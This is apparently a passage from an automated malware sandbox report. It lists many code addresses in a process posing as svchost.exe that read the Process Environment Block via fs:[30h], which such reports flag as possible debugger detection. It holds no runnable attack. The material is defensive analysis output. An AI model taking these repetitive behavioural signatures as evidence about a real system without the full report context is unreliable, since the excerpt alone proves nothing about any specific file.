            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEC188 mov eax, dword ptr fs:[00000030h]3_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEC188 mov eax, dword ptr fs:[00000030h]3_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD4180 mov eax, dword ptr fs:[00000030h]3_2_03AD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD4180 mov eax, dword ptr fs:[00000030h]3_2_03AD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB019F mov eax, dword ptr fs:[00000030h]3_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB019F mov eax, dword ptr fs:[00000030h]3_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB019F mov eax, dword ptr fs:[00000030h]3_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB019F mov eax, dword ptr fs:[00000030h]3_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A197 mov eax, dword ptr fs:[00000030h]3_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A197 mov eax, dword ptr fs:[00000030h]3_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A197 mov eax, dword ptr fs:[00000030h]3_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B061E5 mov eax, dword ptr fs:[00000030h]3_2_03B061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A601F8 mov eax, dword ptr fs:[00000030h]3_2_03A601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF61C3 mov eax, dword ptr fs:[00000030h]3_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF61C3 mov eax, dword ptr fs:[00000030h]3_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]3_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A60124 mov eax, dword ptr fs:[00000030h]3_2_03A60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov ecx, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov ecx, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov ecx, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov eax, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADE10E mov ecx, dword ptr fs:[00000030h]3_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADA118 mov ecx, dword ptr fs:[00000030h]3_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADA118 mov eax, dword ptr fs:[00000030h]3_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADA118 mov eax, dword ptr fs:[00000030h]3_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADA118 mov eax, dword ptr fs:[00000030h]3_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF0115 mov eax, dword ptr fs:[00000030h]3_2_03AF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04164 mov eax, dword ptr fs:[00000030h]3_2_03B04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04164 mov eax, dword ptr fs:[00000030h]3_2_03B04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC4144 mov eax, dword ptr fs:[00000030h]3_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC4144 mov eax, dword ptr fs:[00000030h]3_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC4144 mov ecx, dword ptr fs:[00000030h]3_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC4144 mov eax, dword ptr fs:[00000030h]3_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC4144 mov eax, dword ptr fs:[00000030h]3_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C156 mov eax, dword ptr fs:[00000030h]3_2_03A2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC8158 mov eax, dword ptr fs:[00000030h]3_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36154 mov eax, dword ptr fs:[00000030h]3_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A36154 mov eax, dword ptr fs:[00000030h]3_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A280A0 mov eax, dword ptr fs:[00000030h]3_2_03A280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC80A8 mov eax, dword ptr fs:[00000030h]3_2_03AC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF60B8 mov eax, dword ptr fs:[00000030h]3_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]3_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3208A mov eax, dword ptr fs:[00000030h]3_2_03A3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]3_2_03A2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A380E9 mov eax, dword ptr fs:[00000030h]3_2_03A380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB60E0 mov eax, dword ptr fs:[00000030h]3_2_03AB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]3_2_03A2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A720F0 mov ecx, dword ptr fs:[00000030h]3_2_03A720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB20DE mov eax, dword ptr fs:[00000030h]3_2_03AB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2A020 mov eax, dword ptr fs:[00000030h]3_2_03A2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C020 mov eax, dword ptr fs:[00000030h]3_2_03A2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC6030 mov eax, dword ptr fs:[00000030h]3_2_03AC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB4000 mov ecx, dword ptr fs:[00000030h]3_2_03AB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD2000 mov eax, dword ptr fs:[00000030h]3_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E016 mov eax, dword ptr fs:[00000030h]3_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E016 mov eax, dword ptr fs:[00000030h]3_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E016 mov eax, dword ptr fs:[00000030h]3_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E016 mov eax, dword ptr fs:[00000030h]3_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5C073 mov eax, dword ptr fs:[00000030h]3_2_03A5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A32050 mov eax, dword ptr fs:[00000030h]3_2_03A32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB6050 mov eax, dword ptr fs:[00000030h]3_2_03AB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A307AF mov eax, dword ptr fs:[00000030h]3_2_03A307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE47A0 mov eax, dword ptr fs:[00000030h]3_2_03AE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD678E mov eax, dword ptr fs:[00000030h]3_2_03AD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A527ED mov eax, dword ptr fs:[00000030h]3_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A527ED mov eax, dword ptr fs:[00000030h]3_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A527ED mov eax, dword ptr fs:[00000030h]3_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]3_2_03ABE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A347FB mov eax, dword ptr fs:[00000030h]3_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A347FB mov eax, dword ptr fs:[00000030h]3_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]3_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB07C3 mov eax, dword ptr fs:[00000030h]3_2_03AB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C720 mov eax, dword ptr fs:[00000030h]3_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C720 mov eax, dword ptr fs:[00000030h]3_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6273C mov eax, dword ptr fs:[00000030h]3_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6273C mov ecx, dword ptr fs:[00000030h]3_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6273C mov eax, dword ptr fs:[00000030h]3_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAC730 mov eax, dword ptr fs:[00000030h]3_2_03AAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C700 mov eax, dword ptr fs:[00000030h]3_2_03A6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A30710 mov eax, dword ptr fs:[00000030h]3_2_03A30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A60710 mov eax, dword ptr fs:[00000030h]3_2_03A60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38770 mov eax, dword ptr fs:[00000030h]3_2_03A38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40770 mov eax, dword ptr fs:[00000030h]3_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6674D mov esi, dword ptr fs:[00000030h]3_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6674D mov eax, dword ptr fs:[00000030h]3_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6674D mov eax, dword ptr fs:[00000030h]3_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A30750 mov eax, dword ptr fs:[00000030h]3_2_03A30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABE75D mov eax, dword ptr fs:[00000030h]3_2_03ABE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72750 mov eax, dword ptr fs:[00000030h]3_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72750 mov eax, dword ptr fs:[00000030h]3_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB4755 mov eax, dword ptr fs:[00000030h]3_2_03AB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]3_2_03A6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A666B0 mov eax, dword ptr fs:[00000030h]3_2_03A666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A34690 mov eax, dword ptr fs:[00000030h]3_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A34690 mov eax, dword ptr fs:[00000030h]3_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB06F1 mov eax, dword ptr fs:[00000030h]3_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB06F1 mov eax, dword ptr fs:[00000030h]3_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]3_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]3_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E627 mov eax, dword ptr fs:[00000030h]3_2_03A4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A66620 mov eax, dword ptr fs:[00000030h]3_2_03A66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A68620 mov eax, dword ptr fs:[00000030h]3_2_03A68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3262C mov eax, dword ptr fs:[00000030h]3_2_03A3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAE609 mov eax, dword ptr fs:[00000030h]3_2_03AAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4260B mov eax, dword ptr fs:[00000030h]3_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72619 mov eax, dword ptr fs:[00000030h]3_2_03A72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF866E mov eax, dword ptr fs:[00000030h]3_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF866E mov eax, dword ptr fs:[00000030h]3_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A660 mov eax, dword ptr fs:[00000030h]3_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A660 mov eax, dword ptr fs:[00000030h]3_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A62674 mov eax, dword ptr fs:[00000030h]3_2_03A62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4C640 mov eax, dword ptr fs:[00000030h]3_2_03A4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB05A7 mov eax, dword ptr fs:[00000030h]3_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB05A7 mov eax, dword ptr fs:[00000030h]3_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB05A7 mov eax, dword ptr fs:[00000030h]3_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A545B1 mov eax, dword ptr fs:[00000030h]3_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A545B1 mov eax, dword ptr fs:[00000030h]3_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A32582 mov eax, dword ptr fs:[00000030h]3_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A32582 mov ecx, dword ptr fs:[00000030h]3_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A64588 mov eax, dword ptr fs:[00000030h]3_2_03A64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E59C mov eax, dword ptr fs:[00000030h]3_2_03A6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A325E0 mov eax, dword ptr fs:[00000030h]3_2_03A325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C5ED mov eax, dword ptr fs:[00000030h]3_2_03A6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6C5ED mov eax, dword ptr fs:[00000030h]3_2_03A6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E5CF mov eax, dword ptr fs:[00000030h]3_2_03A6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E5CF mov eax, dword ptr fs:[00000030h]3_2_03A6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A365D0 mov eax, dword ptr fs:[00000030h]3_2_03A365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]3_2_03A6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]3_2_03A6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40535 mov eax, dword ptr fs:[00000030h]3_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40535 mov eax, dword ptr fs:[00000030h]3_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40535 mov eax, dword ptr fs:[00000030h]3_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40535 mov eax, dword ptr fs:[00000030h]3_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40535 mov eax, dword ptr fs:[00000030h]3_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40535 mov eax, dword ptr fs:[00000030h]3_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E53E mov eax, dword ptr fs:[00000030h]3_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E53E mov eax, dword ptr fs:[00000030h]3_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E53E mov eax, dword ptr fs:[00000030h]3_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E53E mov eax, dword ptr fs:[00000030h]3_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5E53E mov eax, dword ptr fs:[00000030h]3_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC6500 mov eax, dword ptr fs:[00000030h]3_2_03AC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04500 mov eax, dword ptr fs:[00000030h]3_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04500 mov eax, dword ptr fs:[00000030h]3_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04500 mov eax, dword ptr fs:[00000030h]3_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04500 mov eax, dword ptr fs:[00000030h]3_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04500 mov eax, dword ptr fs:[00000030h]3_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04500 mov eax, dword ptr fs:[00000030h]3_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B04500 mov eax, dword ptr fs:[00000030h]3_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6656A mov eax, dword ptr fs:[00000030h]3_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6656A mov eax, dword ptr fs:[00000030h]3_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6656A mov eax, dword ptr fs:[00000030h]3_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38550 mov eax, dword ptr fs:[00000030h]3_2_03A38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A38550 mov eax, dword ptr fs:[00000030h]3_2_03A38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A364AB mov eax, dword ptr fs:[00000030h]3_2_03A364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A644B0 mov ecx, dword ptr fs:[00000030h]3_2_03A644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]3_2_03ABA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEA49A mov eax, dword ptr fs:[00000030h]3_2_03AEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A304E5 mov ecx, dword ptr fs:[00000030h]3_2_03A304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2E420 mov eax, dword ptr fs:[00000030h]3_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2E420 mov eax, dword ptr fs:[00000030h]3_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2E420 mov eax, dword ptr fs:[00000030h]3_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C427 mov eax, dword ptr fs:[00000030h]3_2_03A2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB6420 mov eax, dword ptr fs:[00000030h]3_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB6420 mov eax, dword ptr fs:[00000030h]3_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB6420 mov eax, dword ptr fs:[00000030h]3_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB6420 mov eax, dword ptr fs:[00000030h]3_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB6420 mov eax, dword ptr fs:[00000030h]3_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB6420 mov eax, dword ptr fs:[00000030h]3_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB6420 mov eax, dword ptr fs:[00000030h]3_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6A430 mov eax, dword ptr fs:[00000030h]3_2_03A6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A68402 mov eax, dword ptr fs:[00000030h]3_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A68402 mov eax, dword ptr fs:[00000030h]3_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A68402 mov eax, dword ptr fs:[00000030h]3_2_03A68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABC460 mov ecx, dword ptr fs:[00000030h]3_2_03ABC460
